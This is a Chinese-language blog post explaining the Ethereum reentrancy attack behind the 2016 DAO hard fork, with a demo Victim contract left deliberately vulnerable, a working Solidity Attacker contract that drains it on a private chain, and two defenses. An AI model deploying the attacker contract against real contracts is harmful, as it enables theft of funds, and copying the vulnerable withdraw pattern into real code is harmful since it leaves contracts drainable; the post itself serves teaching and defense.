codedonus
codedonus

以太坊攻击——重入攻击

本文简单介绍了以太坊上的著名攻击——重入攻击。

2016年6月17日,以太坊遭遇了有史以来最大的一场黑客攻击,受到威胁的金额将近占当时以太坊总量的14%,为了解决这个问题,以太坊社区被迫进行以太坊硬分叉,分成了以太经典(未分叉)和以太坊(硬分叉)两个社区。而事件背后的罪魁祸首就是本文的中心——重入攻击(Reentry Attack)。本文将使用一个简单的案例来重现重入攻击。

攻击原理

本文用以下Solidity代码来举例:

pragma solidity ^0.4.26;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            msg.sender.call.value(amount)();
            userBalannce[msg.sender] = 0;
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

该攻击出现的原因是在victim合约中的withdraw函数使用了call()方法,call()方法调用完之后,由于找不到对应的方法签名,会默认调用fallback()函数。在本例中,attacker在调用完call()方法之后,接下来并不是执行userBalannce[msg.sender] = 0; 而是Attacker收到了Ether后,调用了回调函数,在回调函数中,又重新调用了Victim的withdraw。因此形成了一个循环,直至Victim中的Ether被清0.

攻击实现

首先由钱包1创建victim合约,并向victim合约中充值1ETH,接着由钱包2创建attacker合约,并向attacker合约中充值0.1ETH。接着通过钱包2调用attacker合约向victim合约充值0.1ETH,最后调用Reentry函数,将victim中的ETH全部转到attacker合约中。

创建Victim合约并将数据导入私链
创建Attacker合约并将数据导入私链
attacker将victim中的ETH全部盗取到自己的合约中

防护措施

(1) 使用transfer()函数:由于transfer转账功能只能发送2300gas不足以使目的地址/合约调用另外一份合约(即重入发送合约);

(2) 引入互斥锁。也就是说,要添加一个在代码执行过程中锁定合约的状态变量,阻止重入调用。


欢迎关注我的个人推特:https://twitter.com/kongtaoxing

CC BY-NC-ND 2.0

Like my work?
Don't forget to support or like, so I know you are with me..

Loading...

Comment